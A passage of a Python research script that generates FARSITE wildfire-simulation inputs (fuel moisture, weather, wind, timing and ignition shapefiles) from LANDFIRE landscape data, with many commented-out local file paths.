#string = string+'%.0f\t%.1f\t%.1f\t%.1f\t%.1f\t%.1f\n'%(fuelModels[i],m1h,m10h,m100h,lhm,lwm)
string = string+'%.0f %.1f %.1f %.1f %.1f %.1f\n'%(fuelModels[i],m1h,m10h,m100h,lhm,lwm)
return string
def getMaxDay(Mth):
maxDay = 31
if Mth == 4 or Mth == 6 or Mth == 9 or Mth == 11:
maxDay = 30
if Mth == 2:
maxDay = 28
return maxDay
def incrementDay(Day,Mth):
Day = Day + 1
maxDay = getMaxDay(Mth)
if Day > maxDay:
Day = 1
Mth = Mth+1
if Mth > 12:
Mth = 1
return Day, Mth
def getWeatherData(string,params,Elv,totalDays=2):
string = string+"WEATHER_DATA: %.0f\n"%(totalDays)
Mth = round(params['Mth'])
Day = round(params['Day'])
maxDay = getMaxDay(Mth)
Day = min(Day,maxDay)
Pcp = params['Pcp']
mTH = round(params['mTH'],-2)
xTH = round(params['xTH'],-2)
mT = params['mT']
xT = params['xT']
xH = params['xH']
mH = params['mH']
PST = round(params['PST'],-2)
PET = round(params['PET'],-2)
for i in range(0,totalDays):
# Mth Day Pcp mTH xTH mT xT xH mH Elv PST PET
Day, Mth = incrementDay(Day,Mth)
string = string+'%.0f %.0f %.1f %.0f %.0f %.1f %.1f %.1f %.1f %.0f %.0f %.0f\n'%(
Mth,Day,0,mTH,xTH,mT,xT,xH,xH,Elv,0,0)
string = string+"WEATHER_DATA_UNITS: Metric\n"
return string
def getWindData(string,params,totalDays=2):
string = string+"WIND_DATA: %.0f\n"%(totalDays*24)
windSpeed = params['windSpeed'] # mph
windDir = params['windDir']
windSpeed = windSpeed*5280*12*25.4/(1000*1000) # km/h
Mth = round(params['Mth'])
Day = round(params['Day'])
maxDay = getMaxDay(Mth)
Day = min(Day,maxDay)
for i in range(0,totalDays):
# Mth Day Hour Speed Direction CloudCover
Day, Mth = incrementDay(Day,Mth)
for Hour in range(0,2400,100):
string = string+'%.0f %.0f %.0f %.1f %.1f %.1f\n'%(
Mth,Day,Hour,windSpeed,windDir,0)
string = string+"WIND_DATA_UNITS: Metric\n"
return string
def getMiscData(string):
string = string + "FOLIAR_MOISTURE_CONTENT: 100\n"
string = string + "CROWN_FIRE_METHOD: Finney\n" # Either Finney or ScottRhienhardt
string = string + "FARSITE_SPOT_PROBABILITY: 0.01\n"
string = string + "FARSITE_SPOT_IGNITION_DELAY: 15\n"
string = string + "FARSITE_MINIMUM_SPOT_DISTANCE: 30\n"
string = string + "FARSITE_ACCELERATION_ON: 1\n"
return string
def getSimulationData(string,params,totalDays=2):
Mth = round(params['Mth'])
Day = round(params['Day'])
maxDay = getMaxDay(Mth)
Day = min(Day,maxDay)
startTime = params['startTime']
startHour = np.floor(startTime)
startMin = int(round((startTime-startHour)*60,0))
startHour = int(startHour)
Day, Mth = incrementDay(Day,Mth)
Day, Mth = incrementDay(Day,Mth)
sTime = datetime.datetime(year=2016,month=Mth,day=Day,hour=startHour,minute=startMin)
eTime = datetime.datetime(year=2016,month=Mth,day=Day)+datetime.timedelta(days=totalDays-2)
#eTime = sTime+datetime.timedelta(days=totalDays-3)
sTimeString = sTime.strftime('%m %d %H%M')
eTimeString = eTime.strftime('%m %d %H%M')
string = string + "FARSITE_START_TIME: %s\n"%(sTimeString)
string = string + "FARSITE_END_TIME: %s\n"%(eTimeString)
string = string + "FARSITE_TIME_STEP: 60\n"
string = string + "FARSITE_DISTANCE_RES: 30.0\n"
string = string + "FARSITE_PERIMETER_RES: 60.0\n"
return string
def getIgnitionData(string,ignitionFile):
string = string + "FARSITE_IGNITION_FILE: %s\n"%(ignitionFile)
return string
def saveFarsiteInput(string,file):
with open(file,'w') as f:
f.write(string)
def generateFarsiteInput(file,elevation,ignitionFile,totalDays=5):
paramsInput = bp.getStandardParamsInput()
params = bp.getRandomConditions(paramsInput,allowDynamicModels=True)
string = ''
string = getFuelMoistureData(string,params)
string = getWeatherData(string,params,elevation,totalDays=totalDays)
string = getWindData(string,params,totalDays=totalDays)
string = getSimulationData(string,params,totalDays=totalDays)
string = getMiscData(string)
string = getIgnitionData(string,ignitionFile)
saveFarsiteInput(string,file+'.input')
print(string)
return params
def getLcpElevation(file):
imgs, names, header = readLcpFile(file)
elevation = np.median(imgs[0])
return elevation
def makeCenterIgnition(file,N=5):
imgs, names, header = readLcpFile(file)
eastUtm = header[1039]; westUtm = header[1040]
northUtm = header[1041]; southUtm = header[1042]
xResol = header[1044]; yResol = header[1045];
centerX = (eastUtm+westUtm)/2
centerY = (northUtm+southUtm)/2
corners = [[centerX-N*xResol,centerY-N*yResol],
[centerX-N*xResol,centerY+N*yResol],
[centerX+N*xResol,centerY+N*yResol],
[centerX+N*xResol,centerY-N*yResol]]
points = [Point(xyz) for xyz in corners]
geometry = Polygon([[p.x,p.y] for p in points])
data = gpd.GeoDataFrame([[0,0]],columns=['ENTITY','VALUE'],geometry=[geometry]) # ENTITY=0, VALUE = 0
file = file.replace('.LCP','_ignite.SHP')
data.to_file(driver = 'ESRI Shapefile', filename=file)
return data
def generateCmdFile(lcps,inputs,ignites,outputs,cmdFile):
cDir = 'commonDir/data/'
string = ''
for lcp, Input, ignite, output in zip(lcps,inputs,ignites,outputs):
string = string+'%s%s %s%s %s%s 0 %s%s 0\n'%(cDir,lcp,cDir,Input,cDir,ignite,cDir,output)
with open(cmdFile,'w') as f:
f.write(string)
if __name__ == "__main__":
imgFile = 'G:\\WildfireResearch\\landfireData\\old\\US_140FBFM40\\1\\US_140FBFM40.tif'
#imgFile = 'E:/projects/wildfire-research/landfireData/US_140FBFM40/1/test2.tif'
data, lat, lon = readImgFile(imgFile)
#plt.contourf(lon,lat,data)
#inDirs = ['E:/projects/wildfire-research/landfireData/US_140FBFM40/1/',
# 'E:/projects/wildfire-research/landfireData/US_140FBFM40/2/',
# 'E:/projects/wildfire-research/landfireData/US_140FBFM40/3/',
# 'E:/projects/wildfire-research/landfireData/US_140FBFM40/4/']
#outDir = 'E:/projects/wildfire-research/farsiteData/fireModel40/'
#namespace = 'US_140FBFM40'
#inDirs = ['E:/projects/wildfire-research/landfireData/US_DEM2010/1/',
# 'E:/projects/wildfire-research/landfireData/US_DEM2010/2/',
# 'E:/projects/wildfire-research/landfireData/US_DEM2010/3/',
# 'E:/projects/wildfire-research/landfireData/US_DEM2010/4/',
# 'E:/projects/wildfire-research/landfireData/US_DEM2010/5/',
# 'E:/projects/wildfire-research/landfireData/US_DEM2010/6/',
# 'E:/projects/wildfire-research/landfireData/US_DEM2010/7/']
#outDir = 'E:/projects/wildfire-research/farsiteData/dem2010/'
#namespace = 'US_DEM2010'
#inDirs = ['E:/projects/wildfire-research/landfireData/US_140FBFM40/1/']
#namespace = 'US_140FBFM40'
#splitImages(inDirs,namespace)
#Tf, iTf = getTransformFromMtoD()
lats = np.random.random((1000,))*(44-34)+34
lons = np.random.random((1000,))*(-114+121)-121
distance = 25000
#extractListOfCoordinates(lats,lons,distance)
#limitAscLimits()
indir = 'G:\\WildfireResearch\\farsiteData\\'
generateListLcpFiles(indir)
#indir = "E:/projects/wildfire-research/landfireData/Processed/"
#names = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40',
# 'US_140CC','US_140CH','US_140CBH','US_140CBD']
#namespace = indir+'california.LCP'
#generateLcpFileTif(indir,names,namespace)
#names = ['US_140CC','US_140CH','US_140CBH','US_140CBD']
"""
commandFile = 'commonDir/farsite/example/Panther/runPanther.txt'
inDir = 'E:/projects/wildfire-research/farsite/data/'
cDir = 'commonDir/data/'
#namespace = 'n117-9343_36-5782_3000'
namespace = 'n114-0177_38-3883_25000'
totalDays = 5
lcpFile = namespace+'.LCP'
inputFile = namespace+'.input'
igniteFile = namespace+'_ignite.SHP'
outputFile = namespace+'_out'
cmdFile = inDir+'toRun.txt'
cmdFileDocker = cDir+'toRun.txt'
elevation = getLcpElevation(inDir+lcpFile)
ignitionShape = makeCenterIgnition(inDir+lcpFile)
fileName = inDir+namespace
params = generateFarsiteInput(fileName,elevation,cDir+igniteFile,totalDays=totalDays)
generateCmdFile([lcpFile],[inputFile],[igniteFile],[outputFile],cmdFile)
runFarsite(cmdFileDocker)
"""
#dataOut = gpd.GeoDataFrame.from_file(inDir+outputFile+'_Perimeters.shp')
#dataIn = gpd.GeoDataFrame.from_file(inDir+igniteFile)
#filename = 'E:/projects/wildfire-research/farsite/data/californiaRaw.LCP'
#inDir = 'E:/projects/wildfire-research/farsite/data/'
#print(checkPoint([[lon,lat]]))
#datas, headers, names = generateLcpFile(lats,lons,distance,inDir)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.